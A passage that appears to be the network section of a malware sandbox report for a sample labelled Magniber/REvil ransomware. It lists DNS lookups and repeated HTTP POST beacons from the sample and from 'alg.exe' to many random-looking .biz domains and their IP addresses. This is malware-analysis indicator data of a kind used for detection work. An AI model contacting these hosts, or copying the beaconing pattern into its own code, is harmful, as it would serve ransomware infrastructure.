Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=72c23f1fcbbd351cf4e6be77122ff23c|191.101.209.39|1719160469|1719160469|0|1|0; path=/; domain=.napws.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

napws.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

napws.biz

IN A

Response

napws.biz

IN A

35.164.78.200
DNS

qvuhsaqa.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

qvuhsaqa.biz

IN A

Response

qvuhsaqa.biz

IN A

54.244.188.177
POST

http://qvuhsaqa.biz/gudjod

alg.exe

Remote address:

54.244.188.177:80

Request

POST /gudjod HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qvuhsaqa.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1bfa5ca825eef5068ff39371ca82ed56|191.101.209.39|1719160470|1719160470|0|1|0; path=/; domain=.qvuhsaqa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://napws.biz/gudjod

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

35.164.78.200:80

Request

POST /gudjod HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: napws.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=28dd45444c554a53458e11390f0d8003|191.101.209.39|1719160470|1719160470|0|1|0; path=/; domain=.napws.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

qvuhsaqa.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

qvuhsaqa.biz

IN A

Response

qvuhsaqa.biz

IN A

54.244.188.177
DNS

apzzls.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

apzzls.biz

IN A

Response

apzzls.biz

IN A

34.211.97.45
POST

http://qvuhsaqa.biz/hjevxo

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

54.244.188.177:80

Request

POST /hjevxo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qvuhsaqa.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0092ea07118eb8f777a492878ff16e2d|191.101.209.39|1719160470|1719160470|0|1|0; path=/; domain=.qvuhsaqa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://apzzls.biz/hjevxo

alg.exe

Remote address:

34.211.97.45:80

Request

POST /hjevxo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: apzzls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5beb365edff49bb85374a5f6503856ca|191.101.209.39|1719160470|1719160470|0|1|0; path=/; domain=.apzzls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

apzzls.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

apzzls.biz

IN A

Response

apzzls.biz

IN A

34.211.97.45
DNS

krnsmlmvd.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

krnsmlmvd.biz

IN A

Response

krnsmlmvd.biz

IN A

47.129.31.212
POST

http://apzzls.biz/olsvw

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

34.211.97.45:80

Request

POST /olsvw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: apzzls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 922

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 23 Jun 2024 16:34:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1aa3ead414e6cedd2651e33b3b0c5a17|191.101.209.39|1719160471|1719160471|0|1|0; path=/; domain=.apzzls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://krnsmlmvd.biz/wkgb

alg.exe

Remote address:

47.129.31.212:80

Request

POST /wkgb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: krnsmlmvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
DNS

krnsmlmvd.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Remote address:

8.8.8.8:53

Request

krnsmlmvd.biz

IN A

Response

krnsmlmvd.biz

IN A

47.129.31.212

54.244.188.177:80

http://pywolwnvd.biz/fiome

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
661 B
6
6

HTTP Request

POST http://pywolwnvd.biz/fiome

HTTP Response

200
54.244.188.177:80

http://pywolwnvd.biz/stiyorx

http

alg.exe

1.4kB
661 B
6
6

HTTP Request

POST http://pywolwnvd.biz/stiyorx

HTTP Response

200
18.141.10.107:80

http://ssbzmoy.biz/bscett

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
659 B
6
6

HTTP Request

POST http://ssbzmoy.biz/bscett

HTTP Response

200
18.141.10.107:80

http://ssbzmoy.biz/vtuu

http

alg.exe

1.4kB
667 B
6
6

HTTP Request

POST http://ssbzmoy.biz/vtuu

HTTP Response

200
54.244.188.177:80

http://cvgrf.biz/yrxcpttgqj

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
665 B
6
6

HTTP Request

POST http://cvgrf.biz/yrxcpttgqj

HTTP Response

200
54.244.188.177:80

http://cvgrf.biz/dbofrwblmkayp

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://cvgrf.biz/dbofrwblmkayp

HTTP Response

200
44.221.84.105:80

http://npukfztj.biz/g

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
668 B
6
6

HTTP Request

POST http://npukfztj.biz/g

HTTP Response

200
172.234.222.143:80

http://przvgke.biz/qsnwx

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
204 B
6
5

HTTP Request

POST http://przvgke.biz/qsnwx
44.221.84.105:80

http://npukfztj.biz/if

http

alg.exe

1.4kB
660 B
6
6

HTTP Request

POST http://npukfztj.biz/if

HTTP Response

200
172.234.222.143:80

http://przvgke.biz/if

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
204 B
6
5

HTTP Request

POST http://przvgke.biz/if
172.234.222.143:80

http://przvgke.biz/ttt

http

alg.exe

1.4kB
212 B
6
5

HTTP Request

POST http://przvgke.biz/ttt
18.141.10.107:80

http://knjghuig.biz/yroifghpflyp

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
668 B
6
6

HTTP Request

POST http://knjghuig.biz/yroifghpflyp

HTTP Response

200
172.234.222.143:80

http://przvgke.biz/gomt

http

alg.exe

1.4kB
204 B
6
5

HTTP Request

POST http://przvgke.biz/gomt
18.141.10.107:80

http://knjghuig.biz/crufnxhgtq

http

alg.exe

1.4kB
668 B
6
6

HTTP Request

POST http://knjghuig.biz/crufnxhgtq

HTTP Response

200
82.112.184.197:80

lpuegx.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

152 B
3
82.112.184.197:80

lpuegx.biz

alg.exe

152 B
3
82.112.184.197:80

lpuegx.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

152 B
3
82.112.184.197:80

lpuegx.biz

alg.exe

152 B
3
82.112.184.197:80

vjaxhpbji.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

152 B
3
82.112.184.197:80

vjaxhpbji.biz

alg.exe

152 B
3
82.112.184.197:80

vjaxhpbji.biz

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

152 B
3
82.112.184.197:80

vjaxhpbji.biz

alg.exe

152 B
3
47.129.31.212:80

http://xlfhhhm.biz/umsjegcmfdsxrv

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
667 B
6
6

HTTP Request

POST http://xlfhhhm.biz/umsjegcmfdsxrv

HTTP Response

200
47.129.31.212:80

http://xlfhhhm.biz/idvyemitvlcfuuh

http

alg.exe

1.4kB
667 B
6
6

HTTP Request

POST http://xlfhhhm.biz/idvyemitvlcfuuh

HTTP Response

200
13.251.16.150:80

http://ifsaia.biz/qbkxi

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
658 B
6
6

HTTP Request

POST http://ifsaia.biz/qbkxi

HTTP Response

200
13.251.16.150:80

http://ifsaia.biz/tbp

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://ifsaia.biz/tbp

HTTP Response

200
44.221.84.105:80

http://saytjshyf.biz/yfwtec

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
661 B
6
6

HTTP Request

POST http://saytjshyf.biz/yfwtec

HTTP Response

200
18.141.10.107:80

http://vcddkls.biz/x

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
659 B
6
6

HTTP Request

POST http://vcddkls.biz/x

HTTP Response

200
44.221.84.105:80

http://saytjshyf.biz/k

http

alg.exe

1.4kB
669 B
6
6

HTTP Request

POST http://saytjshyf.biz/k

HTTP Response

200
18.141.10.107:80

http://vcddkls.biz/k

http

alg.exe

1.4kB
667 B
6
6

HTTP Request

POST http://vcddkls.biz/k

HTTP Response

200
172.234.222.143:80

http://fwiwk.biz/jwfw

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
204 B
6
5

HTTP Request

POST http://fwiwk.biz/jwfw
172.234.222.143:80

http://fwiwk.biz/acytqoynepalncmh

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
204 B
6
5

HTTP Request

POST http://fwiwk.biz/acytqoynepalncmh
34.246.200.160:80

http://tbjrpv.biz/b

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
666 B
6
6

HTTP Request

POST http://tbjrpv.biz/b

HTTP Response

200
18.208.156.248:80

http://deoci.biz/vdfprnykloltsh

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
665 B
6
6

HTTP Request

POST http://deoci.biz/vdfprnykloltsh

HTTP Response

200
172.234.222.143:80

http://fwiwk.biz/ar

http

alg.exe

1.4kB
204 B
6
5

HTTP Request

POST http://fwiwk.biz/ar
208.100.26.245:80

http://gjogvvpsf.biz/gdroexodml

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

8.4kB
5.8kB
18
15

HTTP Request

POST http://gytujflc.biz/wfvmjmbppfxvhg

HTTP Response

404

HTTP Request

POST http://gytujflc.biz/nkjpklwdjn

HTTP Response

404

HTTP Request

POST http://yunalwv.biz/aip

HTTP Response

404

HTTP Request

POST http://yunalwv.biz/ngxupksupbbo

HTTP Response

404

HTTP Request

POST http://gjogvvpsf.biz/dnfgyo

HTTP Response

404

HTTP Request

POST http://gjogvvpsf.biz/gdroexodml

HTTP Response

404
172.234.222.143:80

http://fwiwk.biz/qxlueibwaatcts

http

alg.exe

1.4kB
204 B
6
5

HTTP Request

POST http://fwiwk.biz/qxlueibwaatcts
34.246.200.160:80

http://tbjrpv.biz/bhr

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://tbjrpv.biz/bhr

HTTP Response

200
13.251.16.150:80

http://qaynky.biz/vpqhnith

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
658 B
6
6

HTTP Request

POST http://qaynky.biz/vpqhnith

HTTP Response

200
18.208.156.248:80

http://deoci.biz/ucx

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://deoci.biz/ucx

HTTP Response

200
208.100.26.245:80

http://gjogvvpsf.biz/ujplvwgge

http

alg.exe

7.5kB
5.0kB
17
14

HTTP Request

POST http://gytujflc.biz/lorsuojsqmiheih

HTTP Response

404

HTTP Request

POST http://gytujflc.biz/ublpuneyruv

HTTP Response

404

HTTP Request

POST http://yunalwv.biz/gtxnr

HTTP Response

404

HTTP Request

POST http://yunalwv.biz/tqhpnqcnvcaed

HTTP Response

404

HTTP Request

POST http://gjogvvpsf.biz/ifoqyoyqxsdqsxdr

HTTP Response

404

HTTP Request

POST http://gjogvvpsf.biz/ujplvwgge

HTTP Response

404
13.251.16.150:80

http://qaynky.biz/trvn

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://qaynky.biz/trvn

HTTP Response

200
44.221.84.105:80

http://bumxkqgxu.biz/pvrubihkage

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
669 B
6
6

HTTP Request

POST http://bumxkqgxu.biz/pvrubihkage

HTTP Response

200
54.244.188.177:80

http://dwrqljrr.biz/pqbqsojpeqqv

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
660 B
6
6

HTTP Request

POST http://dwrqljrr.biz/pqbqsojpeqqv

HTTP Response

200
35.164.78.200:80

http://nqwjmb.biz/fqdwocrtv

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
658 B
6
6

HTTP Request

POST http://nqwjmb.biz/fqdwocrtv

HTTP Response

200
44.221.84.105:80

http://bumxkqgxu.biz/wgncekwnjgom

http

alg.exe

1.4kB
661 B
6
6

HTTP Request

POST http://bumxkqgxu.biz/wgncekwnjgom

HTTP Response

200
54.244.188.177:80

http://dwrqljrr.biz/nlhffdsb

http

alg.exe

1.4kB
660 B
6
6

HTTP Request

POST http://dwrqljrr.biz/nlhffdsb

HTTP Response

200
3.94.10.34:80

http://ytctnunms.biz/raglhhxbtyp

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
661 B
6
6

HTTP Request

POST http://ytctnunms.biz/raglhhxbtyp

HTTP Response

200
165.160.13.20:80

http://myups.biz/fvdnfhdrgbq

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

2.9kB
708 B
9
9

HTTP Request

POST http://myups.biz/imapiyt

HTTP Response

200

HTTP Request

POST http://myups.biz/fvdnfhdrgbq

HTTP Response

200
35.164.78.200:80

http://nqwjmb.biz/jlncn

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://nqwjmb.biz/jlncn

HTTP Response

200
54.244.188.177:80

http://oshhkdluh.biz/mma

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
661 B
6
6

HTTP Request

POST http://oshhkdluh.biz/mma

HTTP Response

200
3.94.10.34:80

http://ytctnunms.biz/mma

http

alg.exe

1.4kB
669 B
6
6

HTTP Request

POST http://ytctnunms.biz/mma

HTTP Response

200
165.160.15.20:80

http://myups.biz/dqbbxdl

http

alg.exe

2.7kB
708 B
9
9

HTTP Request

POST http://myups.biz/dyuuwlucrjbjmes

HTTP Response

200

HTTP Request

POST http://myups.biz/dqbbxdl

HTTP Response

200
34.211.97.45:80

http://jpskm.biz/tdv

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
665 B
6
6

HTTP Request

POST http://jpskm.biz/tdv

HTTP Response

200
54.244.188.177:80

http://oshhkdluh.biz/elsqqjnb

http

alg.exe

1.4kB
669 B
6
6

HTTP Request

POST http://oshhkdluh.biz/elsqqjnb

HTTP Response

200
54.244.188.177:80

http://lrxdmhrr.biz/gtxnr

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
660 B
6
6

HTTP Request

POST http://lrxdmhrr.biz/gtxnr

HTTP Response

200
34.211.97.45:80

http://jpskm.biz/shrnabr

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://jpskm.biz/shrnabr

HTTP Response

200
18.141.10.107:80

http://wllvnzb.biz/jtl

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
659 B
6
6

HTTP Request

POST http://wllvnzb.biz/jtl

HTTP Response

200
54.244.188.177:80

http://lrxdmhrr.biz/fwtdygyp

http

alg.exe

1.4kB
668 B
6
6

HTTP Request

POST http://lrxdmhrr.biz/fwtdygyp

HTTP Response

200
18.141.10.107:80

http://wllvnzb.biz/bxhyix

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://wllvnzb.biz/bxhyix

HTTP Response

200
18.208.156.248:80

http://gnqgo.biz/cnngnhfm

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
657 B
6
6

HTTP Request

POST http://gnqgo.biz/cnngnhfm

HTTP Response

200
44.221.84.105:80

http://jhvzpcfg.biz/ssij

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
660 B
6
6

HTTP Request

POST http://jhvzpcfg.biz/ssij

HTTP Response

200
18.141.10.107:80

http://acwjcqqv.biz/n

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
668 B
6
6

HTTP Request

POST http://acwjcqqv.biz/n

HTTP Response

200
18.208.156.248:80

http://gnqgo.biz/elxnfsbaqbuod

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://gnqgo.biz/elxnfsbaqbuod

HTTP Response

200
44.221.84.105:80

http://jhvzpcfg.biz/uqrjgkvnkj

http

alg.exe

1.4kB
668 B
6
6

HTTP Request

POST http://jhvzpcfg.biz/uqrjgkvnkj

HTTP Response

200
18.141.10.107:80

http://acwjcqqv.biz/vscgxqyrpa

http

alg.exe

1.4kB
660 B
6
6

HTTP Request

POST http://acwjcqqv.biz/vscgxqyrpa

HTTP Response

200
44.213.104.86:80

http://vyome.biz/uedb

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
665 B
6
6

HTTP Request

POST http://vyome.biz/uedb

HTTP Response

200
18.208.156.248:80

http://yauexmxk.biz/p

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
668 B
6
6

HTTP Request

POST http://yauexmxk.biz/p

HTTP Response

200
13.251.16.150:80

http://iuzpxe.biz/hwteskrqdafmt

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
658 B
6
6

HTTP Request

POST http://iuzpxe.biz/hwteskrqdafmt

HTTP Response

200
44.213.104.86:80

http://vyome.biz/r

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://vyome.biz/r

HTTP Response

200
18.208.156.248:80

http://yauexmxk.biz/imupdvoamilqva

http

alg.exe

1.4kB
668 B
6
6

HTTP Request

POST http://yauexmxk.biz/imupdvoamilqva

HTTP Response

200
13.251.16.150:80

http://iuzpxe.biz/yyoteokngq

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://iuzpxe.biz/yyoteokngq

HTTP Response

200
13.251.16.150:80

http://sxmiywsfv.biz/yq

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
661 B
6
6

HTTP Request

POST http://sxmiywsfv.biz/yq

HTTP Response

200
13.251.16.150:80

http://sxmiywsfv.biz/kwihkufqghoig

http

alg.exe

1.4kB
661 B
6
6

HTTP Request

POST http://sxmiywsfv.biz/kwihkufqghoig

HTTP Response

200
34.211.97.45:80

http://vrrazpdh.biz/i

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
668 B
6
6

HTTP Request

POST http://vrrazpdh.biz/i

HTTP Response

200
47.129.31.212:80

http://ftxlah.biz/npd

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
666 B
6
6

HTTP Request

POST http://ftxlah.biz/npd

HTTP Response

200
34.211.97.45:80

http://vrrazpdh.biz/nlhuo

http

alg.exe

1.4kB
660 B
6
6

HTTP Request

POST http://vrrazpdh.biz/nlhuo

HTTP Response

200
47.129.31.212:80

http://ftxlah.biz/ql

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://ftxlah.biz/ql

HTTP Response

200
13.251.16.150:80

http://typgfhb.biz/uucur

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
659 B
6
6

HTTP Request

POST http://typgfhb.biz/uucur

HTTP Response

200
13.251.16.150:80

http://typgfhb.biz/s

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://typgfhb.biz/s

HTTP Response

200
34.211.97.45:80

http://esuzf.biz/wlhw

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
665 B
6
6

HTTP Request

POST http://esuzf.biz/wlhw

HTTP Response

200
3.94.10.34:80

http://gvijgjwkh.biz/al

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
661 B
6
6

HTTP Request

POST http://gvijgjwkh.biz/al

HTTP Response

200
34.211.97.45:80

http://esuzf.biz/oiiaqnphi

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://esuzf.biz/oiiaqnphi

HTTP Response

200
44.213.104.86:80

http://qpnczch.biz/bg

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
659 B
6
6

HTTP Request

POST http://qpnczch.biz/bg

HTTP Response

200
3.254.94.185:80

http://brsua.biz/rslxnvajajvbs

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
657 B
6
6

HTTP Request

POST http://brsua.biz/rslxnvajajvbs

HTTP Response

200
3.94.10.34:80

http://gvijgjwkh.biz/bxspjswoyd

http

alg.exe

1.4kB
661 B
6
6

HTTP Request

POST http://gvijgjwkh.biz/bxspjswoyd

HTTP Response

200
85.214.228.140:80

http://dlynankz.biz/sncufccolsidh

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
378 B
5
5

HTTP Request

POST http://dlynankz.biz/sncufccolsidh

HTTP Response

404
44.213.104.86:80

http://qpnczch.biz/rlfsql

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://qpnczch.biz/rlfsql

HTTP Response

200
47.129.31.212:80

http://oflybfv.biz/rlfsql

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
659 B
6
6

HTTP Request

POST http://oflybfv.biz/rlfsql

HTTP Response

200
3.254.94.185:80

http://brsua.biz/eyxlrkwl

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://brsua.biz/eyxlrkwl

HTTP Response

200
85.214.228.140:80

http://dlynankz.biz/ptqfykioy

http

alg.exe

1.4kB
378 B
5
5

HTTP Request

POST http://dlynankz.biz/ptqfykioy

HTTP Response

404
47.129.31.212:80

http://oflybfv.biz/yaqdchf

http

alg.exe

1.4kB
667 B
6
6

HTTP Request

POST http://oflybfv.biz/yaqdchf

HTTP Response

200
34.211.97.45:80

http://yhqqc.biz/uydyoxmvdlhxfw

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
657 B
6
6

HTTP Request

POST http://yhqqc.biz/uydyoxmvdlhxfw

HTTP Response

200
47.129.31.212:80

http://mnjmhp.biz/qyjvwwttjkt

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
658 B
6
6

HTTP Request

POST http://mnjmhp.biz/qyjvwwttjkt

HTTP Response

200
34.211.97.45:80

http://yhqqc.biz/qnngjbqoruufm

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://yhqqc.biz/qnngjbqoruufm

HTTP Response

200
47.129.31.212:80

http://mnjmhp.biz/lvscssxmxtg

http

alg.exe

1.4kB
666 B
5
6

HTTP Request

POST http://mnjmhp.biz/lvscssxmxtg

HTTP Response

200
18.208.156.248:80

http://opowhhece.biz/jxkqcwivcbpbeux

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.6kB
661 B
6
6

HTTP Request

POST http://opowhhece.biz/jxkqcwivcbpbeux

HTTP Response

200
13.251.16.150:80

http://jdhhbs.biz/fbsc

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
658 B
6
6

HTTP Request

POST http://jdhhbs.biz/fbsc

HTTP Response

200
18.208.156.248:80

http://opowhhece.biz/w

http

alg.exe

1.4kB
661 B
6
6

HTTP Request

POST http://opowhhece.biz/w

HTTP Response

200
13.251.16.150:80

http://jdhhbs.biz/j

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://jdhhbs.biz/j

HTTP Response

200
34.246.200.160:80

http://mgmsclkyu.biz/rauxoqos

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
661 B
6
6

HTTP Request

POST http://mgmsclkyu.biz/rauxoqos

HTTP Response

200
18.141.10.107:80

http://warkcdu.biz/rclmhpqx

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.6kB
707 B
8
7

HTTP Request

POST http://warkcdu.biz/rclmhpqx

HTTP Response

200
34.246.200.160:80

http://mgmsclkyu.biz/vcev

http

alg.exe

1.4kB
669 B
6
6

HTTP Request

POST http://mgmsclkyu.biz/vcev

HTTP Response

200
18.141.10.107:80

http://warkcdu.biz/vdvrf

http

alg.exe

1.4kB
667 B
6
6

HTTP Request

POST http://warkcdu.biz/vdvrf

HTTP Response

200
13.251.16.150:80

http://gcedd.biz/pcwflvmf

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://gcedd.biz/pcwflvmf

HTTP Response

200
13.251.16.150:80

http://gcedd.biz/bpifsvqhv

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
665 B
6
6

HTTP Request

POST http://gcedd.biz/bpifsvqhv

HTTP Response

200
18.208.156.248:80

http://jwkoeoqns.biz/qlbhhpb

http

alg.exe

1.4kB
661 B
6
6

HTTP Request

POST http://jwkoeoqns.biz/qlbhhpb

HTTP Response

200
44.213.104.86:80

http://xccjj.biz/ixo

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://xccjj.biz/ixo

HTTP Response

200
18.208.156.248:80

http://jwkoeoqns.biz/cuipqcdfgsj

http

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

1.5kB
661 B
6
6

HTTP Request

POST http://jwkoeoqns.biz/cuipqcdfgsj

HTTP Response

200
44.213.104.86:80

http://xccjj.biz/sicsrtxs

http

